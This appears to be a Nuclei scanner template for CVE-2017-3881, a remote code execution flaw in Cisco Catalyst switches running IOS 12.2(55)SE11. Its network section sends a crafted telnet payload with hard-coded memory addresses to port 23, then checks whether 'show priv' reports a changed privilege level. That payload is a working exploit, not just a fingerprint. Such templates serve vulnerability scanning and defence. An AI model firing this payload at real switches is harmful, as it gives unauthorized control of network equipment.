31 lines
1.3 KiB
YAML
31 lines
1.3 KiB
YAML
id: CVE-2017-3881
|
|
|
|
info:
|
|
name: Cisco IOS 12.2(55)SE11 Remote Code Execution
|
|
author: dwisiswant0
|
|
severity: critical
|
|
reference:
|
|
- https://github.com/artkond/cisco-rce
|
|
- https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
|
|
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
|
|
description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent.
|
|
tags: cve,cve2017,cisco,rce,network
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2017-3881
|
|
cwe-id: CWE-20
|
|
|
|
network:
|
|
- inputs:
|
|
- data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
|
|
read: 1024
|
|
- data: "show priv"
|
|
read: 1024
|
|
host:
|
|
- "{{Hostname}}:23"
|
|
read-size: 1024
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Current privilege level is" |